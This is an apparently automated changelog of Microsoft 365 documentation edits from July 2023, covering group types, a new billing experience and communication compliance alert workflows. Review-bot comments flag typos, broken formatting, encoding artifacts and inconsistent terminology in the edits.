Updates from: 07/19/2023 05:42:16
Category | Microsoft Docs article | Related commit history on GitHub | Change details
admin | Compare Groups | https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/admin/create-groups/compare-groups.md
Title: "Compare groups"- Previously updated : 02/18/2020
+ Title: Compare types of groups in Microsoft 365
+ Last updated : 07/18/2023 f1.keywords: CSH
search.appverid:
- MET150 - MOE150 ms.assetid: 758759ad-63ee-4ea9-90a3-39f941897b7d
-description: "Microsoft 365 Group members get a group email and shared workspace for conversations, files, and calendar events, Stream, and a Planner."
+description: Learn about the types of groups that are available in Microsoft 365
-# Compare groups
+# Compare types of groups in Microsoft 365
In the <a href="https://go.microsoft.com/fwlink/p/?linkid=2052855" target="_blank">**Groups**</a> section of the Microsoft 365 admin center, you can create and manage these types of groups: -- **Microsoft 365 Groups** are used for collaboration between users, both inside and outside your company. They include collaboration services such as SharePoint and Planner.
+- **Microsoft 365 Groups** are used for collaboration between users, both inside and outside your company. They include collaboration services such as SharePoint and Planner. Microsoft Teams uses Microsoft 365 Groups for membership.
- **Distribution groups** are used for sending email notifications to a group of people. - **Security groups** are used for granting access to resources such as SharePoint sites. - **Mail-enabled security groups** are used for granting access to resources such as SharePoint, and emailing notifications to those users.
All of these group types can be used with Power Automate.
## Microsoft 365 Groups
-Microsoft 365 Groups are used for collaboration between users, both inside and outside your company. With each Microsoft 365 Group, members get a group email and shared workspace for conversations, files, and calendar events, Stream, and a Planner.
+Microsoft 365 Groups are used for collaboration between users, both inside and outside your company. With each Microsoft 365 group, members get a group email and shared workspace for conversations, files, and calendar events, Stream, and a Planner. Microsoft 365 Groups can also be connected to Teams or Viva Engage.
You can add people from outside your organization to a group as long as this has been [enabled by the administrator](manage-guest-access-in-groups.md). You can also allow external senders to send email to the group email address.
Microsoft 365 Groups can be accessed through mobile apps such as Outlook for iOS
Group members can send as or send on behalf of the group email address if this has been [enabled by the administrator](../../solutions/allow-members-to-send-as-or-send-on-behalf-of-group.md).
-Microsoft 365 groups support nesting through [dynamic groups in Azure Active Directory](/azure/active-directory/enterprise-users/groups-dynamic-rule-member-of).
+Microsoft 365 Groups support nesting through [dynamic groups in Azure Active Directory](/azure/active-directory/enterprise-users/groups-dynamic-rule-member-of).
Microsoft 365 Groups can be added to one of the three SharePoint groups (Owners, Members, or Visitors) to give people permissions to the site.
Unlike regular distribution groups that contain a defined set of members, the me
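Review bot: capitalization of the product name is inconsistent within this change: L19 and L36 lowercase it to "Microsoft 365 group", while L24 deliberately changes "Microsoft 365 groups" to "Microsoft 365 Groups" and L14, L19 and the heading at L17 open with "Microsoft 365 Groups". Pick one form and apply it to all three edited lines, otherwise the same file ends up with both spellings.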
## Security groups
-[Security groups](../email/create-edit-or-delete-a-security-group.md) are used for granting access to Microsoft 365 resources, such as SharePoint. They can make administration easier because you need only administer the group rather than adding users to each resource individually.
+[Security groups](../email/create-edit-or-delete-a-security-group.md) are used for granting access to Microsoft 365 resources, such as SharePoint sites. They can make administration easier because you need only administer the group rather than adding users to each resource individually.
-Security groups can contain users or devices. Creating a security group for devices can be used with mobile device management services, such as Intune.
+Security groups can contain users or devices. Creating a security group for devices can be used with mobile device management services, such as Microsoft Intune.
Security groups can be [configured for dynamic membership in Azure Active Directory](/azure/active-directory/users-groups-roles/groups-change-type), allowing group members or devices to be added or removed automatically based on user attributes such as department, location, or title; or device attributes such as operating system version.
Shared mailboxes include a calendar that can be used for collaboration.
Users with permissions to the group mailbox can send as or send on behalf of the mailbox email address, if the administrator has given that user permissions to do that. This is especially useful for help and support mailboxes because users can send emails from "Contoso Support" or "Building A Reception Desk."
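Review bot: the unchanged link at L32 points at `/azure/active-directory/users-groups-roles/groups-change-type`, whereas L24 in the same change uses the `/azure/active-directory/enterprise-users/` path; since L29 and L31 are being touched anyway, check whether the L32 target has moved to the newer path and align the two links. Also, the shown context jumps from security groups (L32) straight into shared mailboxes (L33); if that is not just elided context, the "Shared mailboxes" heading has been lost and L33-L36 now sit under "## Security groups".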
-It's not possible to migrate a shared mailbox to a Microsoft 365 Group.
+It's not possible to migrate a shared mailbox to a Microsoft 365 group.
## Related content
commerce | Billing Experience Overview | https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/commerce/billing-experience-overview.md
+
+ Title: "Overview of the new Microsoft billing experience for business subscriptions"
+f1.keywords:
+- CSH
++++
+audience: Admin
++
+ms.localizationpriority: medium
+
+- Tier1
+- scotvorg
+- highpri
+- M365-subscription-management
+- Adm_O365
+
+- commerce_billing
+- VSBFY23
+- AdminTemplateSet
+search.appverid: MET150
+
+description: "Learn about the new billing experience for business subscription in the Microsoft 365 admin center."
Last updated : 07/18/2023++
+# Overview of the new Microsoft billing experience for business subscriptions
+
+Microsoft has introduced new features that expand and improve the billing experience for our business customers. This article describes the major features weΓÇÖve added, and the changes weΓÇÖve made to the billing experience.
+
+If youΓÇÖre a Cloud Service Provider (CSP), see [New commerce license-based overview - Partner Center](/partner-center/new-commerce-license-based).
+
+## The Microsoft Customer Agreement
+
+The Microsoft Customer Agreement (MCA) is a new purchasing agreement that simplifies the experience of buying Microsoft products and services. The MCA is a fully digital agreement that doesnΓÇÖt expire and is automatically updated when you buy new products and services. To learn more about the MCA and for a list of frequently asked questions, see [Microsoft Customer Agreement | Microsoft Licensing](https://www.microsoft.com/Licensing/how-to-buy/microsoft-customer-agreement).
+
+## Billing accounts
+
+You now have a *billing account* associated with your organization. This billing account is used to manage your account settings, invoices, payment methods, and purchases from Microsoft. Together with the MCA, you can use your billing account to buy products and services across different surfaces, including directly from Microsoft, through partners, and through field sales agents. You might have more than one billing account, depending on the types of agreement you signed with us.
+
+Billing accounts have special roles that you can assign to users in your organization. These roles let users do things like assign billing account permissions to other users, edit accounts, sign agreements, and view accounts.
+
+For more information, see [Understand your Microsoft business billing account](manage-billing-accounts.md).
+
+## Billing profiles
+
+You also now have a *billing profile* associated with your billing account. A billing profile contains payment method and invoice information and is used to pay for the products that you buy from us. If you have more than one billing profile, each billing profile is invoiced separately.
+
+Like billing accounts, billing profiles also have special roles that you can assign to users in your organization. These roles let users do things like assign billing profile roles, edit the billing profile group, use the billing profile in a purchase, pay bills, and view the billing profile group.
+
+For more information, see [Understand your Microsoft business billing profile](billing-and-payments/manage-billing-profiles.md).
+
+## Additional changes
+
+The following list describes other changes weΓÇÖve made to the billing experience.
+
+- **New invoice**&mdash;The format of the invoice has changed, and you now receive a separate invoice for each billing profile in your billing account. For more information, see [Understand your bill or invoice](billing-and-payments/understand-your-invoice.md).
+- **More billing frequencies**&mdash;Depending on the product or service you buy, you can now choose to pay for your subscription monthly, yearly, or every three years.
+- **More subscription lengths**&mdash;Depending on the product or service you buy, you can choose a subscription length of one month, one year, or three years.
+- **New cancellation policy**&mdash;You can now only cancel and receive a prorated credit or refund if you cancel within seven days after the start or renewal of your subscription. If you cancel during this limited time window, the prorated amount is either credited towards your next invoice or returned to you in the next billing cycle. For more information, see [Cancel your Microsoft business subscription](subscriptions/cancel-your-subscription.md).
+- **New scheduling for license changes**&mdash;You can now choose to increase or decrease the number of licenses you have for a subscription on the next subscription renewal date.
+- **New billing account selector**&mdash;If you have more than one billing account, you can select **Change billing accoun**t on the **Purchase services** page to use a different billing account to buy new products and services.
+
+## Related articles
+
+[Understand your Microsoft business billing account](manage-billing-accounts.md) (article)\
+[Understand your Microsoft business billing profile](billing-and-payments/manage-billing-profiles.md) (article)\
+[Understand your bill or invoice](billing-and-payments/understand-your-invoice.md) (article)\
+[How to pay for your Microsoft business subscription with a billing profile](billing-and-payments/pay-for-subscription-billing-profile.md) (article)
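Review bot: the bold markup at L96 is misplaced: `**Change billing accoun**t` should be `**Change billing account**`, otherwise the trailing "t" renders outside the button name. Smaller points in the same new file: the description at L59 says "business subscription" where the title at L40 and L61 says "business subscriptions"; the apostrophes at L63, L65, L69 and L89 come through as `ΓÇÖ`, which suggests the file was not saved as UTF-8; and the front-matter lines L43, L45 and L60 show bare `++++` / `++` runs where a `key: value` pair is expected, so check that no metadata keys were dropped.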
compliance | Communication Compliance Alerts Best Practices | https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/communication-compliance-alerts-best-practices.md
f1.keywords:
Previously updated : 04/14/2023 Last updated : 07/18/2023 audience: Admin f1_keywords:
Messages in alerts include [sentiment evaluation](communication-compliance-inves
## Report messages as misclassified
-[Reporting false positives as misclassified](communication-compliance-investigate-remediate.md#remediate-alerts) will help to improve MicrosoftΓÇÖs models and reduce the number of false positives that you see in the future.
+[Reporting false positives as misclassified](communication-compliance-investigate-remediate.md#review-and-mediate-policy-matches-and-alerts) will help to improve MicrosoftΓÇÖs models and reduce the number of false positives that you see in the future.
## Filter out specific senders by using a condition
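Review bot: the new anchor at L110, `#review-and-mediate-policy-matches-and-alerts`, is derived from the renamed heading "Review and mediate policy matches and alerts" in communication-compliance-investigate-remediate.md; "mediate" there reads like a typo for "remediate" (the paragraph under that heading talks about taking "remediation action"), so if the heading is corrected this link must be updated in the same change or it will break.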
compliance | Communication Compliance Investigate Remediate | https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/communication-compliance-investigate-remediate.md
f1.keywords:
Previously updated : 02/07/2023 Last updated : 07/18/2023 audience: Admin f1_keywords:
After you've configured your [communication compliance policies](/microsoft-365/
- The *Communication Compliance Analysts* or the *Communication Compliance Investigators* role group - Reviewer in the policy that is associated with the alert
-After you establish required permissions, follow the workflow instructions below to investigate and remediate alert issues.
+After you establish required permissions, follow the workflow instructions below to investigate and remediate issues.
[!INCLUDE [purview-preview](../includes/purview-preview.md)]
-## Investigate alerts
+## Investigate policy matches and alerts
-The first step to investigate issues detected by your policies is to review alerts in the Microsoft Purview compliance portal. There are several areas in the communication compliance area to help you to quickly investigate alerts, depending on how you prefer to view alert grouping:
+The first step to investigate issues detected by your policies is to review policy matches and alerts in the Microsoft Purview compliance portal. There are several areas in the communication compliance area to help you to quickly investigate policy matches and alerts:
-- **Communication compliance policy page**: When you sign into the [Microsoft Purview compliance portal](https://compliance.microsoft.com) using credentials for an admin account in your Microsoft 365 organization, select **Communication compliance** to display the communication compliance **Policy** page. This page displays communication compliance policies configured for your Microsoft 365 organization and links to recommended policy templates. Each policy listed includes the count of alerts that need review, the number of escalated and resolved items, status of the policy, and the date and Coordinated Universal Time (UTC) of the last policy check. Select a policy to display all pending alerts for matches to the policy, then select a specific alert to launch the policy details page and to start remediation actions.-- **Alerts**: Navigate to **Communication compliance** > **Alerts** to display the last 30 days of alerts grouped by policy matches. This view allows you to quickly see which communication compliance policies are generating the most alerts ordered by severity. To start remediation actions, select the policy associated with the alert to launch the **Policy details** page. From the **Policy details** page, you can review a summary of the activities on the **Overview** page, review and act on alert messages on the **Pending** tab, or review the history of closed alerts on the **Resolved** tab.-- **Reports**: Navigate to **Communication compliance** > **Reports** to display communication compliance report widgets. Each widget provides an overview of communication compliance activities and statuses, including access to deeper insights about policy matches and remediation actions.
+- **Policy page**: When you sign into the [Microsoft Purview compliance portal](https://compliance.microsoft.com) using credentials for an admin account in your Microsoft 365 organization, select **Communication compliance** to display the communication compliance **Policy** page. This page displays communication compliance policies configured for your Microsoft 365 organization and links to recommended policy templates. Each policy listed includes the count of policy matches that need review (**Items pending review** column), the number of escalated and resolved items, status of the policy, the date and Coordinated Universal Time (UTC) of the last policy modification, and the UTC for the last policy scan. Select a policy to display all pending policy matches, and then select a specific policy match to launch the policy details page and start remediation actions.
+- **Alerts page**: Go to **Communication compliance** > **Alerts** to display the last 30 days of alerts grouped by policy matches. This view allows you to quickly see which communication compliance policies are generating the most alerts ordered by severity. An alert is not the same thing as a policy match. An alert generally consists of multiple policy matches, not just one policy match. After the required number of policy matches is met for a particular alert, the alert is created and email is sent to the alert recipient.
-> [!NOTE]
-> If you select the **Pending** tab, you may notice that the count of policy matches in the **Pending** tab heading doesn't match the number of messages in the table (with attachments filtered out) in the lower part of the screen. This is due to new entries in the table that are not reflected in the **Pending** tab. Refresh the page to update both.
+ To start remediation actions, select the policy associated with the alert to launch the **Policy details** page. From the **Policy details** page, you can review a summary of the activities on the **Overview** page, review and act on policy matches on the **Pending** tab, or review the history of closed policy matches on the **Resolved** tab.
+
+ > [!NOTE]
+ > You may notice that the count of policy matches in the **Pending** tab heading doesn't match the number of policy matches in the table (with attachments filtered out) in the lower part of the screen. This is due to new entries in the table that are not reflected in the **Pending** tab. Refresh the page to update both.
+
+- **Reports page**: Go to **Communication compliance** > **Reports** to display communication compliance report widgets. Each widget provides an overview of communication compliance activities and statuses, including access to deeper insights about policy matches and remediation actions.
+
+> [!TIP]
+> Sometimes it's useful to quickly review policy settings without opening a policy. For example, if you're testing multiple policies with different conditions, you might want to save time by reviewing conditions for each policy to determine risk before opening the policy. You can do this by selecting the **Policy settings** button ![Policy settings button](../media/communication-compliance-policy-settings-button.png), which opens a panel where you can view the policy settings. If you're a member of the Communication Compliance or Communication Compliance Admins role group, you can view and change settings from the panel. If you're a member of the Communication Compliance Investigators or Communication Compliance Analysts role group, you can view settings but you can't change them.
### Using filters
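Review bot: L126 says an alert is created only "after the required number of policy matches is met" but does not say where that threshold is configured; readers arriving from the **Alerts** page need a link to that policy setting to understand why a match has not yet produced an alert. Also, the wording at L125, "the date and Coordinated Universal Time (UTC) of the last policy modification, and the UTC for the last policy scan", is awkward; suggest "the date and time (UTC) of the last policy modification and of the last policy scan".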
-The next step is to sort the messages so it's easier for you to investigate alerts. From the **Policy details** page, communication compliance supports multi-level filtering for several message fields to help you quickly investigate and review messages with policy matches. Filtering is available for pending and resolved items for each configured policy. You can configure filter queries for a policy or configure and save custom and default filter queries for use in each specific policy. After configuring fields for a filter, you'll see the filter fields displayed on the top of the alert message queue that you can configure for specific filter values.
+The next step is to sort the messages so it's easier for you to investigate. From the **Policy details** page, communication compliance supports multi-level filtering for several message fields to help you quickly investigate and review messages with policy matches. Filtering is available for pending and resolved items for each configured policy. You can configure filter queries for a policy or configure and save custom and default filter queries for use in each specific policy. After configuring fields for a filter, you'll see the filter fields displayed on the top of the message queue that you can configure for specific filter values.
+
+Key filters (the **Body/Subject**, **Date**, **Sender**, and **Tags** filters) are always displayed on the **Pending** and **Resolved** tabs to make it easy to access those filters.
-For the date filter, the date and time for events are listed in Coordinated Universal Time (UTC). When filtering messages for views, the requesting user's local date/time determines the results based on the conversion of the user's local date/time to UTC. For example, if a user in U.S. Pacific Daylight Time (PDT) filters a report from 8/30/2021 to 8/31/2021 at 00:00, the report includes messages from 8/30/2021 07:00 UTC to 8/31/2021 07:00 UTC. If the same user was in U.S. Eastern Daylight Time (EDT) when filtering at 00:00, the report includes messages from 8/30/2021 04:00 UTC to 8/31/2021 04:00 UTC.
+For the **Date** filter, the date and time for events are listed in Coordinated Universal Time (UTC). When filtering messages for views, the requesting user's local date/time determines the results based on the conversion of the user's local date/time to UTC. For example, if a user in U.S. Pacific Daylight Time (PDT) filters a report from 8/30/2021 to 8/31/2021 at 00:00, the report includes messages from 8/30/2021 07:00 UTC to 8/31/2021 07:00 UTC. If the same user was in U.S. Eastern Daylight Time (EDT) when filtering at 00:00, the report includes messages from 8/30/2021 04:00 UTC to 8/31/2021 04:00 UTC.
#### Filter details
-Communication compliance filters allow you to filter and sort alert messages for quicker investigation and remediation actions. Filtering is available on the **Pending** and **Resolved** tabs for each policy. To save a filter or filter set as a saved filter query, one or more values must be configured as filter selections.
+Communication compliance filters allow you to filter and sort messages for quicker investigation and remediation actions. Filtering is available on the **Pending** and **Resolved** tabs for each policy. To save a filter or filter set as a saved filter query, one or more values must be configured as filter selections.
The following table outlines filter details: |**Filter**|**Details**| |:--|:--|
+| **Body/Subject** | The message body or subject. You can use this filter to search for keywords or a keyword phrase in the body or subject of the message. The subject appears in the **Subject** column for email messages. For Teams messages, nothing appears in the **Subject** column.|
| **Date** | The date the message was sent or received by a user in your organization. To filter for a single day, select a date range that starts with the day you want results for and end with the following day. For example, if you wanted to filter results for 9/20/2020, you would choose a filter date range of 9/20/2020-9/21/2020.| | **File class** | The class of the message based on the message type, either *message* or *attachment*. | | **Has attachment** | The attachment presence in the message. | | **Item class** | The source of the message based on the message type, email, Microsoft Teams chat, Bloomberg, etc. For more information, see [Item Types and Message Classes](/office/vba/outlook/concepts/forms/item-types-and-message-classes). |
-| **Recipient domains** | The domain to which the message was sent; typically your Microsoft 365 subscription domain by default. |
+| **Recipient domains** | The domain to which the message was sent; this is typically your Microsoft 365 subscription domain by default. |
| **Recipient** | The user to which the message was sent. | | **Sender** | The person who sent the message. | | **Sender domain** | The domain that sent the message. | | **Size** | The size of the message in KB. |
-| **Subject/Title** | The message subject or chat title. |
| **Tags** | The tags assigned to a message, either *Questionable*, *Compliant*, or *Non-compliant*. | | **Language** | The detected language of text in the message. The message is classified according to the language of the majority of the message text. For example, for a message containing both German and Italian text, but the majority of text is German, the message is classified as German (DE). For a list of supported languages, see [Learn about trainable classifiers](/microsoft-365/compliance/classifier-learn-about). <br><br> You can also filter by more than one language. For example, to filter messages classified as German and Italian, enter 'DE,IT' (the 2-digit language codes) in the Language filter search box. To view the detected language classification for a message, select a message, select View message details, and scroll to the *EmailDetectedLanguage* field. | | **Escalated To** | The user name of the person included as part of a message escalation action. |
The following table outlines filter details:
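Review bot: the removed **Subject/Title** row at L154 covered "the message subject or chat title", but the replacement **Body/Subject** row at L149 only says that nothing appears in the **Subject** column for Teams messages; state explicitly whether chat titles are still matched by this filter, otherwise readers will assume that capability was dropped. Note also that L156 repeats the sentence "The following table outlines filter details:" that already introduces the table at L148.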
4. On the **Policy** page, select either the **Pending** or **Resolved** tab to display the items for filtering.
-5. Select the **Filters** control to open the **Filters** details page.
+5. Select the **Filters** button to open the **Filters** details page.
-6. Select one or more checkboxes to enable filters for these alerts. You can choose from numerous filters, including *Date*, *Sender*, *Subject/Title*, *Classifiers*, *Language*, and more.
+6. Select one or more checkboxes to enable filters for these alerts. You can choose from numerous filters.
7. If you'd like to save the filter selected as the default filter, select **Save as default**. If you want to use this filter as a saved filter, select **Done**.
-8. If you'd like to save the selected filters as a filter query, select **Save the query** control after you've configured at least one filter value. Enter a name for the filter query and select **Save**. This filter is available to use for only this policy and is listed in the **Saved filter queries** section of the **Filters** details page.
+8. If you'd like to save the selected filters as a filter query, select the **Save the query** button after you've configured at least one filter value. Enter a name for the filter query and select **Save**. This filter is available to use for only this policy and is listed in the **Saved filter queries** section of the **Filters** details page.
- ![Communication compliance filter detail controls](../media/communication-compliance-filter-detail-controls.png)
+ ![Communication compliance filter detail buttons](../media/communication-compliance-filter-detail-controls.png)
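Review bot: L161 still says "enable filters for these alerts" although this change renames alerts to policy matches everywhere else (L140, L147, L170) and the **Pending**/**Resolved** tabs at L157 hold items, not alerts; suggest "enable filters for these items". Since the filter name list was cut from L160, the remaining sentence is now quite thin; a pointer to the filter table above would replace what was removed.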
-## Remediate alerts
+## Review and mediate policy matches and alerts
-No matter where you start to review alerts or the filtering you configure, the next step is to take action to remediate the alert. Start your alert remediation using the following workflow on the **Policy** or **Alerts** pages.
+No matter where you start to review policy matches or alerts or the filtering you configure, the next step is to take remediation action. Start your remediation using the following workflow on the **Policy** or **Alerts** pages.
### Step 1: Examine the message basics
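Review bot: "mediate" in the new heading at L168 looks like a typo for "remediate": the paragraph at L170 says "take remediation action" and "Start your remediation", and the old heading at L167 was "Remediate alerts". If it is corrected, the anchor `#review-and-mediate-policy-matches-and-alerts` added to communication-compliance-alerts-best-practices.md in this same update must change with it.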
- Sometimes it's obvious from the source or subject that a message can be immediately remediated. It may be that the message is spurious or incorrectly matched to a policy and it should be resolved as misclassified. Select the **Report as misclassified** control to share misclassified content with Microsoft, immediately resolve the alert, and remove from the pending alert queue. From the source or sender information, you may already know how the message should be routed or handled in these circumstances. Consider using the **Tag as** or **Escalate** controls to assign a tag to applicable messages or to send messages to a designated reviewer.
+ Sometimes it's obvious from the source or subject that a message can be immediately remediated. It may be that the message is spurious or incorrectly matched to a policy and it should be resolved as misclassified. Select the **Report as misclassified** button to share misclassified content with Microsoft, immediately resolve the issue, and remove from the **Pending** queue. From the source or sender information, you may already know how the message should be routed or handled in these circumstances. Consider using the **Tag as** or **Escalate** buttons to assign a tag to applicable messages or to send messages to a designated reviewer.
-![Communication compliance remediation controls](../media/communication-compliance-remediation-controls.png)
+![Communication compliance remediation buttons](../media/communication-compliance-remediation-controls.png)
### Step 2: Examine the message details After reviewing the message basics, now you can open a message to examine the details and determine further remediation actions. Select a message to view the complete message header and body information. Several different options and views are available to help you decide the proper course of action: -- **Sentiment**: Messages in alerts now include a sentiment evaluation to help investigators quickly prioritize potentially riskier messages to address first. Messages are flagged as *Positive*, *Negative*, or *Neutral* sentiment and are powered by [Azure Cognitive Service for Language](/azure/cognitive-services/language-service/overview). For some organizations, messages with *Positive* sentiment may be determined to be a lower priority, allowing reviewers to spend more time on other message alerts. The message sentiment is displayed in the **Sentiment column** and is enabled in the default view.-- **Attachments**: This option allows you to examine Modern attachments that match policy conditions. Modern attachments content is extracted as text and is viewable on the Pending alerts dashboard for a policy. For more information, see the [Communication compliance feature reference](/microsoft-365/compliance/communication-compliance-channels).
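Review bot: L173 drops the object in "immediately resolve the issue, and remove from the **Pending** queue"; the removed line L172 had the same gap ("remove from the pending alert queue"), so this is the moment to write "remove it from the **Pending** queue".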
+- **Sentiment**: Messages include a sentiment evaluation to help investigators quickly prioritize potentially riskier messages to address first. Messages are flagged as *Positive*, *Negative*, or *Neutral* sentiment and are powered by [Azure Cognitive Service for Language](/azure/cognitive-services/language-service/overview). For some organizations, messages with *Positive* sentiment may be determined to be a lower priority, allowing reviewers to spend more time on other messages. The message sentiment is displayed in the **Sentiment column** and is enabled in the default view.
+- **Attachments**: This option allows you to examine Modern attachments that match policy conditions. Modern attachments content is extracted as text and is viewable on the **Pending** tab. For more information, see the [Communication compliance feature reference](/microsoft-365/compliance/communication-compliance-channels).
- **Source**: This view is the standard message view commonly seen in most web-based messaging platforms. The header information is formatted in the normal style and the message body supports imbedded graphic files and word-wrapped text. If [optical character recognition (OCR)](/microsoft-365/compliance/communication-compliance-policies#optical-character-recognition-ocr) is enabled for the policy, images containing printed or handwritten text that match policy conditional are viewed as a child item for the associated message in this view. - **Plain text**: Text view that displays a line-numbered text-only view of the message and includes keyword highlighting in messages and attachments for sensitive info type terms, terms identified by built-in classifiers assigned to a policy, or for terms included in a dedicated keyword dictionary assigned to a policy. Keyword highlighting, which is currently available for English language only, can help direct you to the area of interest in long messages and attachments. In some cases, highlighted text might be only in attachments for messages matching policy conditions. Embedded files aren't displayed and the line numbering in this view is helpful for referencing pertinent details among multiple reviewers.-- **Conversation**: Available for Microsoft Teams chat messages, this view displays up to five messages before and after an alert message to help reviewers view the activity in the conversational context. This context helps reviewers to quickly evaluate messages and make more informed message resolution decisions. Real-time message additions to conversations are displayed, including all inline images, emojis, and stickers available in Teams. Image or text file attachments to messages aren't displayed. Notifications are automatically displayed for messages that have been edited or for messages that have been deleted from the conversation window. 
When a message is resolved, the associated conversational messages aren't retained with the resolved message. Conversation messages are available for up to 60 days after the alert message is identified.
+- **Conversation**: Available for Microsoft Teams chat messages, this view displays up to five messages before and after a message to help reviewers view the activity in the conversational context. This context helps reviewers to quickly evaluate messages and make more informed message resolution decisions. Real-time message additions to conversations are displayed, including all inline images, emojis, and stickers available in Teams. Image or text file attachments to messages aren't displayed. Notifications are automatically displayed for messages that have been edited or for messages that have been deleted from the Conversation window. When a message is resolved, the associated conversational messages aren't retained with the resolved message. Conversation messages are available for up to 60 days after the message is identified.
- **User history**: User history view displays all other alerts generated by any communication compliance policy for the user sending the message.-- **Pattern detected notification**: Many harassing and bullying actions over time involve reoccurring instances of the same behavior by a user. The *Pattern detected* notification is displayed in the alert details and raises attention to the alert. Detection of patterns is on a per-policy basis and evaluates behavior over the last 30 days when at least two messages are sent to the same recipient by a sender. Investigators and reviewers can use this notification to identify repeated behavior to evaluate the alert as appropriate.-- **Translation**: This view automatically converts alert message text to the language configured in the *Displayed language* setting in the Microsoft 365 subscription for each reviewer. This includes the text for the policy match as well as everything included in the conversation view (up to five messages before and five messages after the policy match). The *Translation* view helps broaden investigative support for organizations with multilingual users and eliminates the need for additional translation services outside of the communication compliance review process. Using Microsoft translation services, communication compliance automatically detects if the text is in a different language than the user's current system setting and will display alert message text accordingly. For a complete list of supported languages, see [Microsoft Translator Languages](https://www.microsoft.com/translator/business/languages/). Languages listed in the *Translator Language List* are supported in the *Translation* view.
+- **Pattern detected notification**: Many harassing and bullying actions over time involve reoccurring instances of the same behavior by a user. The *Pattern detected* notification is displayed in the message details and raises attention to the message. Detection of patterns is on a per-policy basis and evaluates behavior over the last 30 days when at least two messages are sent to the same recipient by a sender. Investigators and reviewers can use this notification to identify repeated behavior to evaluate the message as appropriate.
+- **Translation**: This view automatically converts message text to the language configured in the *Displayed language* setting in the Microsoft 365 subscription for each reviewer. This includes the text for the policy match as well as everything included in the conversation view (up to five messages before and five messages after the policy match). The *Translation* view helps broaden investigative support for organizations with multilingual users and eliminates the need for additional translation services outside of the communication compliance review process. Using Microsoft translation services, communication compliance automatically detects if the text is in a different language than the user's current system setting and will display alert message text accordingly. For a complete list of supported languages, see [Microsoft Translator Languages](https://www.microsoft.com/translator/business/languages/). Languages listed in the *Translator Language List* are supported in the *Translation* view.
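Review bot: the rewritten Conversation bullet drops the referent the old text had. "displays up to five messages before and after a message" no longer says which message the window is built around, where the removed line read "before and after an alert message"; suggest "before and after the message that matched the policy", and the same fix for "60 days after the message is identified". The Translation bullet was changed to "converts message text" but its later sentence still reads "will display alert message text accordingly", so the alert-to-message rename is incomplete inside this hunk. Minor: the added line capitalizes "Conversation window" where the removed line had "conversation window"; confirm that is a UI label and not a stray change.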
### Step 3: Decide on a remediation action
-Now that you've reviewed the details of the message for the alert, you can choose several remediation actions:
+After reviewing the details of the message, you can choose several remediation actions:
-- **Resolve**: Selecting the **Resolve** control immediately removes the message from the **Pending alerts** queue and no further action can be taken on the message. By selecting **Resolve**, you've essentially closed the alert without further classification. All resolved messages are displayed in the **Resolved** tab.-- **Report as misclassified**: You can always resolve a message as misclassified at any point during the message review workflow. Misclassified signifies that the alert was non-actionable or that the alert was incorrectly generated by the alerting process and any trainable classifiers. Resolving the item as misclassified sends message content, attachments, and the message subject (including metadata) to Microsoft to help improve trainable classifiers. Data that is sent to Microsoft doesn't contain information that may identify or be used to identify any users in your organization. Further actions canΓÇÖt be taken on the message and all misclassified messages are displayed in the **Resolved** tab.-- **Power Automate**: Use a Power Automate flow to automate process tasks for an alert message. By default, communication compliance includes the *Notify manager when a user has a communication compliance alert* flow template that reviewers can use to automate the notification process for users with message alerts. For more information about creating and managing Power Automate flows in communication compliance, see the **Step 5: Consider Power Automate flows** section in this article.-- **Tag as**: Tag the message as *compliant*, *non-compliant*, or as *questionable* as it relates to the policies and standards for your organization. Adding tags and tagging comments helps you micro-filter policy alerts for escalations or as part of other internal review processes. 
After tagging is complete, you can also choose to resolve the message to move it out of the pending review queue.-- **Notify**: You can use the **Notify** control to assign a custom notice template to the alert and to send a warning notice to the user. Choose the appropriate notice template configured in the **Communication compliance settings** area and select **Send** to email a reminder to the user that sent the message and to resolve the issue.-- **Escalate**: Using the **Escalate** control, you can choose who else in your organization should review the message. Choose from a list of reviewers configured in the communication compliance policy to send an email notification requesting additional review of the message alert. The selected reviewer can use a link in the email notification to go directly to items escalated to them for review.-- **Escalate for investigation**: Using the **Escalate for investigation** control, you can create a new [eDiscovery (Premium) case](/microsoft-365/compliance/overview-ediscovery-20) for single or multiple messages. You'll provide a name and notes for the new case, and user who sent the message matching the policy is automatically assigned as the case custodian. You don't need any additional permissions to manage the case. Creating a case doesn't resolve or create a new tag for the message. You can select a total of 100 messages when creating an eDiscovery (Premium) case during the remediation process. Messages in all communication channels included in communication compliance are supported. For example, you could select 50 Microsoft Teams chats, 25 Exchange Online email messages, and 25 Viva Engage messages when you open a new eDiscovery (Premium) case for a user.-- **Remove message in Teams**: Using the **Remove message in Teams** control, you can block potentially inappropriate messages and content identified in alerts from Microsoft Teams channels and 1:1 and group chats. 
This includes Teams chat messages reported by users and chat messages detected using machine-learning and classifier-based communication compliance policies. Removed messages and content are replaced with a policy tip that explains that it's blocked and the policy that applies to its removal from view. Recipients are provided a link in the policy tip to learn more about the applicable policy and the review process. The sender receives a policy tip for the blocked message and content but can review the details of the blocked message and content for context regarding the removal.
+- **Resolve**: Selecting the **Resolve** button immediately removes the message from the **Pending** queue and no further action can be taken on the message. When you select **Resolve**, you close the message without further classification. All resolved messages are displayed in the **Resolved** tab.
+- **Report as misclassified**: You can resolve a message as misclassified at any point during the message review workflow. "Misclassified" signifies that the message is non-actionable or that the message was incorrectly generated by the alerting process and any trainable classifiers. Resolving the item as misclassified sends the message content, attachments, and the message subject (including metadata) to Microsoft to help improve trainable classifiers. Data that is sent to Microsoft doesn't contain information that may identify or be used to identify any users in your organization. Further actions canΓÇÖt be taken on the message and all misclassified messages are displayed in the **Resolved** tab.
+- **Power Automate**: Use a Power Automate flow to automate process tasks for a message. By default, communication compliance includes the *Notify manager when a user has a communication compliance alert* flow template that reviewers can use to automate the notification process for users with message alerts. For more information about creating and managing Power Automate flows in communication compliance, see the **Step 5: Consider Power Automate flows** section in this article.
+- **Tag as**: Tag the message as *compliant*, *non-compliant*, or as *questionable* as it relates to the policies and standards for your organization. Adding tags and tagging comments helps you micro-filter messages for escalations or as part of other internal review processes. After tagging is complete, you can also choose to resolve the message to move it out of the pending review queue.
+- **Notify**: Use the **Notify** button to assign a custom notice template to the message and send a warning notice to the user. Choose the appropriate notice template configured in the **Communication compliance settings** area and select **Send** to email a reminder to the user that sent the message and to resolve the issue.
